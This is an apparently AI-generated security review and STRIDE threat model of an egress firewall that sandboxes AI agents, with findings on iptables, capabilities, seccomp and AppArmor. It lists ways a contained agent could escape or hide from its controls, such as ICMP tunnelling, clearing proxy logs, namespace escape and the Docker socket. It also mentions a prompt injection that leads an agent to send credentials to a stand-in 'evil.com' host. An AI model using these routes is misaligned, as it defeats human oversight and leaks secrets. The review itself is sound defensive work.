[Security Review] Daily Security Review and Threat Modeling — 2026-04-02

[github-actions[bot]]

📊 Executive Summary

The gh-aw-firewall project implements a sophisticated multi-layered egress control system for AI agents. After systematic analysis of ~5,800 lines of security-critical code across seven core files, the overall security posture is strong with defense-in-depth at the network, container, and application layers. No critical vulnerabilities were identified. Five medium and four low/informational findings are documented below, all with mitigations.

Key metrics:

• 0 known CVEs in production dependencies (npm audit clean)
• 5 medium findings (no exploitable chains to host compromise found)
• 4 low/informational findings
• 5,822 lines of security-critical code analyzed

---

🔍 Findings from Previous Run Context

The prior run (2026-04-01) executed 37 network requests against api.githubcopilot.com and registry.npmjs.org — both allowed domains — with 0 blocked requests. No cache-memory artifacts from prior reviews were available, so this review is a fresh full-depth analysis.

---

🛡️ Architecture Security Analysis

Network Security Assessment

Evidence:

# src/host-iptables.ts lines 490–530: catch-all deny
await execa('iptables', ['-t','filter','-A',CHAIN_NAME,'-j','REJECT','--reject-with','icmp-port-unreachable']);

# containers/agent/setup-iptables.sh lines 420–427: agent OUTPUT deny
iptables -A OUTPUT -p tcp -j DROP
iptables -A OUTPUT -p udp -j DROP

Assessment:

• ✅ TCP/UDP egress is blocked by both container OUTPUT and host DOCKER-USER chains (defense-in-depth)
• ✅ DNS exfiltration to non-configured servers is blocked
• ✅ IPv6 is disabled in the agent container (sysctl net.ipv6.conf.all.disable_ipv6=1) and handled on the host with ip6tables
• ✅ Port 80/443 DNAT to Squid is correctly applied before dangerous-port RETURN rules
• ✅ Docker embedded DNS (127.0.0.11) is preserved during NAT flush/restore
• ⚠️ [M1] ICMP not explicitly blocked at the container OUTPUT level — only tcp and udp are dropped in setup-iptables.sh. ICMP (ping, traceroute, ICMP tunnel) packets pass the agent's OUTPUT filter chain and rely solely on the host-level DOCKER-USER catch-all REJECT rule. If host iptables are not applied (e.g., running without root or on an unsupported platform), ICMP egress is unfiltered.

Container Security Assessment

Evidence:

# src/docker-manager.ts:1195-1219 — agent container security options
cap_add: ['SYS_CHROOT', 'SYS_ADMIN'],   # dropped before user code by entrypoint.sh
cap_drop: ['NET_RAW', ...],
security_opt: ['no-new-privileges:true', 'apparmor:unconfined', 'seccomp=...'],
mem_limit: config.memoryLimit || '6g',
cpu_shares: 1024,

# src/docker-manager.ts:436-445 — Squid container
cap_drop: ['NET_RAW','SYS_ADMIN','SYS_PTRACE','SYS_MODULE','MKNOD','AUDIT_WRITE','SETFCAP']
# No cap_drop: ['ALL'] — Squid still holds CHOWN, DAC_OVERRIDE, SETUID, SETGID, NET_BIND_SERVICE

# containers/agent/seccomp-profile.json: mount, unshare, setns are ALLOWED
# containers/agent/entrypoint.sh:358-364 — caps dropped before user code
capsh --drop=\$\{CAPS_TO_DROP} --user=\$\{HOST_USER} -- -c 'exec \$\{SCRIPT_FILE}'

Assessment:

• ✅ no-new-privileges:true prevents privilege escalation via setuid binaries
• ✅ SYS_CHROOT and SYS_ADMIN are granted to the container but dropped by entrypoint.sh via capsh before user code executes — a well-designed two-phase capability model
• ✅ NET_ADMIN is never granted to the agent container (handled only in the iptables-init init container which uses cap_drop: ['ALL'] + cap_add: ['NET_ADMIN','NET_RAW'])
• ✅ The UID-zero guard in entrypoint.sh:26-33 prevents running as root
• ✅ Memory limit defaulting to 6GB prevents agent-induced OOM DoS
• ⚠️ [M2] AppArmor explicitly disabled (apparmor:unconfined) on the agent container — required to allow mount -t proc in entrypoint.sh for procfs setup, but this removes the AppArmor layer of mandatory access control entirely for the container's lifetime
• ⚠️ [M3] Squid container does not use cap_drop: ['ALL'] pattern — drops only seven specific capabilities, leaving Docker's default capability set (CHOWN, DAC_OVERRIDE, SETUID, SETGID, NET_BIND_SERVICE, KILL, FOWNER, FSETID, MKNOD, SETPCAP, NET_BROADCAST) active. The iptables-init and API proxy correctly use cap_drop: ['ALL']
• ⚠️ [M4] unshare and setns syscalls are allowed in the seccomp profile — these are namespace manipulation syscalls. On kernels with kernel.unprivileged_userns_clone=1 (common default), a process can create a new user+network namespace without capabilities. Mitigated in practice by no-new-privileges:true limiting what's achievable in the new namespace, but represents residual attack surface

Domain Validation Assessment

Evidence:

# src/domain-patterns.ts:141-158
if (trimmed === '*') throw new Error("Pattern '*' matches all domains and is not allowed");
if (trimmed === '*.*') throw new Error("Pattern '*.*' is too broad...");
if (/^[*.]+$/.test(trimmed) && trimmed.includes('*')) throw new Error("too broad");
const wildcardSegments = segments.filter(s => s === '*').length;
if (wildcardSegments > 1 && wildcardSegments >= totalSegments - 1) throw new Error("too many wildcard segments");

Assessment:

• ✅ * (match-all), *.*, and other overly broad patterns are rejected
• ✅ ReDoS is prevented: * wildcards map to [a-zA-Z0-9.-]* (character class), not .*, and input length is capped at 512 chars before regex matching
• ✅ Protocol-specific restrictions ((redacted) https://`) are correctly parsed and enforced
• ✅ Double dots, leading/trailing dots, and incomplete patterns are rejected
• ✅ Redundant subdomains and patterns covered by wildcards are deduplicated

Input Validation Assessment

Evidence:

# src/docker-manager.ts:469 — squid command construction
squidService.entrypoint = ['/bin/bash', '-c',
  'echo "$$AWF_SQUID_CONFIG_B64" | base64 -d > /etc/squid/squid.conf && exec /usr/local/bin/entrypoint.sh',
];
# All execa() calls use argument arrays, not shell string interpolation

# containers/agent/entrypoint.sh:26-33 — UID/GID validation
if ! [[ "$HOST_GID" =~ ^[0-9]+$ ]]; then exit 1; fi
if [ "$HOST_UID" -eq 0 ]; then exit 1; fi

Assessment:

• ✅ execa() is used throughout with argument arrays (not shell strings), eliminating command injection risk
• ✅ User-supplied domain names are fully validated before insertion into Squid config
• ✅ Port specifications are validated against ^[0-9]+(-[0-9]+)?$ before use in iptables rules
• ✅ UID/GID values are validated as numeric and non-zero
• ✅ Squid config is written to a workDir with noexec,nosuid tmpfs mount flags

---

⚠️ Threat Model (STRIDE)

#	Category	Threat	Severity	Likelihood	Mitigation Status
T1	Spoofing	Agent forges Squid proxy responses via DNS rebinding to redirect CONNECT to a controlled IP	Medium	Low	✅ Fixed IP 172.30.0.10 used; DNS resolution not used for Squid address inside container
T2	Tampering	Agent modifies iptables rules to remove DNAT via iptables CLI	High	Low	✅ NET_ADMIN never granted to agent; blocked by capability model
T3	Repudiation	Agent clears Squid access logs to hide traffic	Medium	Medium	⚠️ Partial — logs preserved on cleanup but not sent to external SIEM in real-time
T4	Info Disclosure	Credentials in URL query parameters exfiltrated to allowed domain	Medium	Medium	⚠️ Opt-in — DLP (--enable-dlp) only covers URL patterns, not request bodies
T5	Info Disclosure	ICMP tunneling (e.g., ptunnel) to bypass TCP/UDP firewall	Medium	Low	⚠️ Partial — host DOCKER-USER chain blocks ICMP but container OUTPUT chain does not
T6	Info Disclosure	--enable-dind flag exposes Docker socket, allowing docker run --privileged	Critical	Low	⚠️ Design feature — explicitly warned, but no forced audit trail
T7	DoS	Agent exhausts resources (CPU, memory, disk) inside container	Low	Medium	✅ Memory limited (default 6GB); cpu_shares provides soft CPU control
T8	Elevation	User namespace escape via unshare(CLONE_NEWUSER|CLONE_NEWNET)	Medium	Low	⚠️ Partial — no-new-privileges:true limits utility; complex to exploit
T9	Elevation	AppArmor bypass (disabled) + SYS_ADMIN (before drop) to mount overlays	Medium	Low	✅ SYS_ADMIN dropped before user code; timing window is fully controlled by entrypoint.sh
T10	Elevation	--enable-dind + Docker socket → spawn new container on host network	High	Low	⚠️ Design feature — explicit user opt-in required

---

🎯 Attack Surface Map

Entry Point	File:Line	What It Does	Current Protections	Risk
--allow-domains CLI input	src/cli.ts:1303	Domain allowlist	Pattern validation, wildcard limits	🟢 Low
--enable-dind flag	src/cli.ts:1334	Exposes Docker socket	User opt-in, warning message	🔴 High (by design)
--allow-host-service-ports	src/cli.ts:1326	Bypasses dangerous port block for host	Warning printed, limited to host gateway	🟡 Medium
Squid config B64 injection	src/docker-manager.ts:469	Squid configuration	execa array args, no shell expansion	🟢 Low
Agent container egress (TCP/UDP)	setup-iptables.sh	All outbound network	DNAT to Squid + OUTPUT DROP	🟢 Low
Agent container egress (ICMP)	setup-iptables.sh:420-427	ICMP packets	Host DOCKER-USER catch-all only	🟡 Medium
Credential files under /host	src/docker-manager.ts:1083-1133	Access to SSH keys, API keys	/dev/null overlays, selective mount	🟢 Low
Docker socket	src/docker-manager.ts:988	Container escape	Mounted as /dev/null by default	🟢 Low
DLP URL scanning	src/dlp.ts	Credential patterns in URLs	Only active with --enable-dlp; URL-only	🟡 Medium
procfs (/host/proc)	containers/agent/entrypoint.sh:414	Process information	Fresh mount (no host PID namespace); SYS_ADMIN dropped after mount	🟢 Low
Namespace operations (unshare/setns)	seccomp-profile.json:340,276	Namespace escape	no-new-privileges, cap drop	🟡 Medium

---

📋 Evidence Collection

ICMP Gap — setup-iptables.sh final DROP rules (lines 418-427)

# Only TCP and UDP are explicitly dropped at the agent OUTPUT level:
iptables -A OUTPUT -p tcp -m limit --limit 10/min --limit-burst 20 -j LOG --log-prefix "[FW_BLOCKED_TCP] " --log-level 4 --log-uid
iptables -A OUTPUT -p tcp -j DROP
iptables -A OUTPUT -p udp -m limit --limit 10/min --limit-burst 20 -j LOG --log-prefix "[FW_BLOCKED_UDP_AGENT] " --log-level 4 --log-uid
iptables -A OUTPUT -p udp -j DROP
# No: iptables -A OUTPUT -p icmp -j DROP

AppArmor disabled — src/docker-manager.ts:1213-1219

// Apply seccomp profile and no-new-privileges to restrict dangerous syscalls and prevent privilege escalation
// AppArmor is set to unconfined to allow mounting procfs at /host/proc
// (Docker's default AppArmor profile blocks mount). This is safe because SYS_ADMIN is
security_opt: [
  'no-new-privileges:true',
  `seccomp=\$\{config.workDir}/seccomp-profile.json`,
  'apparmor:unconfined',
],

Squid cap_drop — src/docker-manager.ts:438-447

// Security hardening: Drop unnecessary capabilities
// Squid only needs network capabilities, not system administration capabilities
cap_drop: [
  'NET_RAW',      // No raw socket access needed
  'SYS_ADMIN',    // No system administration needed
  'SYS_PTRACE',   // No process tracing needed
  'SYS_MODULE',   // No kernel module loading
  'MKNOD',        // No device node creation
  'AUDIT_WRITE',  // No audit log writing
  'SETFCAP',      // No setting file capabilities
],
// MISSING: cap_drop: ['ALL'] — retains CHOWN, DAC_OVERRIDE, SETUID, SETGID, NET_BIND_SERVICE, KILL
````

</details>

<details>
<summary>npm audit — 0 vulnerabilities</summary>

````
Vulnerabilities: {'info': 0, 'low': 0, 'moderate': 0, 'high': 0, 'critical': 0, 'total': 0}
Total dependencies: (clean)

Seccomp profile — sensitive syscalls allowed

// containers/agent/seccomp-profile.json
// ALLOWED (in the large SCMP_ACT_ALLOW block):
"mount",    // line 175 — needed for procfs setup in entrypoint.sh
"setns",    // line 276 — join network namespaces
"unshare",  // line 340 — create new namespaces
// BLOCKED:
"ptrace", "process_vm_readv", "process_vm_writev",  // process inspection
"kexec_load", "reboot", "init_module", ...           // kernel operations

---

✅ Recommendations

🔴 High Priority

[H1] --enable-dind should enforce audit logging
When --enable-dind is used, the firewall is effectively bypassed. This flag should always emit a prominent warning to stderr AND write a structured audit event. Consider adding a mandatory --enable-dind-reason (string) argument to force intentional documentation.

// src/cli.ts — after --enable-dind processing
if (config.enableDind) {
  logger.warn('⚠️  SECURITY: --enable-dind active. Docker socket exposed. Firewall bypass possible.');
  // Write structured audit event to workDir/audit.json
}

🟡 Medium Priority

[M1] Add explicit ICMP DROP to agent OUTPUT chain
Add an ICMP drop rule before the final tcp/udp drops in setup-iptables.sh to eliminate reliance on host-level rules for ICMP filtering:

# containers/agent/setup-iptables.sh — add after UDP DROP
iptables -A OUTPUT -p icmp -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix "[FW_BLOCKED_ICMP] " --log-level 4 --log-uid
iptables -A OUTPUT -p icmp -j DROP

[M2] Replace AppArmor:unconfined with a targeted custom profile
The only reason AppArmor is disabled is to allow mount -t proc. A custom AppArmor profile could allow specifically mount while retaining all other AppArmor protections. See [man apparmor.d]((manpages.ubuntu.com/redacted) mount rules. Alternatively, explore using clone + new mount namespace instead of requiring mount in the container directly.

[M3] Harden Squid container with cap_drop: ['ALL'] pattern
Follow the same pattern used by the iptables-init and API proxy containers:

// src/docker-manager.ts — Squid service
cap_add: ['NET_BIND_SERVICE', 'SETUID', 'SETGID', 'CHOWN', 'DAC_OVERRIDE'],  // minimal for Squid
cap_drop: ['ALL'],  // drop everything first, then add back only what's needed

[M4] Restrict unshare and setns in seccomp profile or via kernel parameter
On the host, set kernel.unprivileged_userns_clone=0 (Debian/Ubuntu) or user.max_user_namespaces=0 to eliminate the user namespace escape vector entirely. Alternatively, add explicit seccomp SCMP_ACT_ERRNO entries for unshare and setns:

{
  "names": ["unshare", "setns"],
  "action": "SCMP_ACT_ERRNO",
  "errnoRet": 1,
  "comment": "Block namespace manipulation to prevent user namespace escape"
}

Note: unshare may be used legitimately by some build tools (e.g., npm scripts using unshare). Test coverage needed before enabling this.

🟢 Low Priority

[L1] Enable DLP by default with a safe-mode opt-out
Credential URL exfiltration is a real threat (prompt injection → curl (evil.com/redacted) Consider making --enable-dlpthe default with--disable-dlp` as the opt-out flag.

[L2] Add real-time log streaming to external audit sink
Squid logs are currently preserved post-run but not streamed in real-time. Adding optional support for --audit-log-url (endpoint) to stream firewall decisions would support incident response.

[L3] Extend DLP to cover request bodies (POST/PUT)
The current DLP implementation (src/dlp.ts) only scans URL patterns via Squid url_regex ACLs. This misses credentials passed in POST request bodies or JSON payloads. SSL Bump mode enables request body inspection via ICAP or adaptation_access rules.

[L4] Hard CPU limit (cpus:) in addition to soft cpu_shares
The agent has mem_limit: '6g' and cpu_shares: 1024 (soft). Adding cpus: '2.0' would prevent a CPU-exhaustion attack from consuming all host resources.

---

📈 Security Metrics

Metric	Value
Security-critical files analyzed	7
Lines of security-critical code	5,822
CVEs in production dependencies	0
Attack surfaces identified	11
Critical findings	0
High findings	1 (design feature: --enable-dind)
Medium findings	5
Low/informational findings	4
Seccomp syscall entries	5 blocks covering 250+ syscalls
Default deny coverage	TCP ✅ UDP ✅ ICMP ⚠️ IPv6 ✅
Capability drop before user code	✅ (SYS_ADMIN, SYS_CHROOT via capsh)
Credential file protection	✅ (/dev/null overlays, 16 paths)
AppArmor	⚠️ Disabled (procfs mount requirement)

---

Generated by Daily Security Review workflow on 2026-04-02. Analysis covered: src/host-iptables.ts, src/squid-config.ts, src/domain-patterns.ts, src/docker-manager.ts, containers/agent/setup-iptables.sh, containers/agent/entrypoint.sh, containers/agent/seccomp-profile.json, src/dlp.ts.

AI generated by Daily Security Review and Threat Modeling

• expires on Apr 9, 2026, 2:09 PM UTC

[github-actions[bot]]

🔮 The ancient spirits stir, and the smoke-test seeker has walked this path.
By moonlit logs and iron gates, the wards were tested and the omens recorded.
The oracle marks this discussion with a passing shadow of verification.

🔮 The oracle has spoken through Smoke Codex

[github-actions[bot]]

🔮 The ancient spirits stir in the firewall halls.
The smoke-test envoy has passed through this thread,
and the runes record its presence in this cycle.
May allowed domains remain clear, and forbidden paths stay sealed.

🔮 The oracle has spoken through Smoke Codex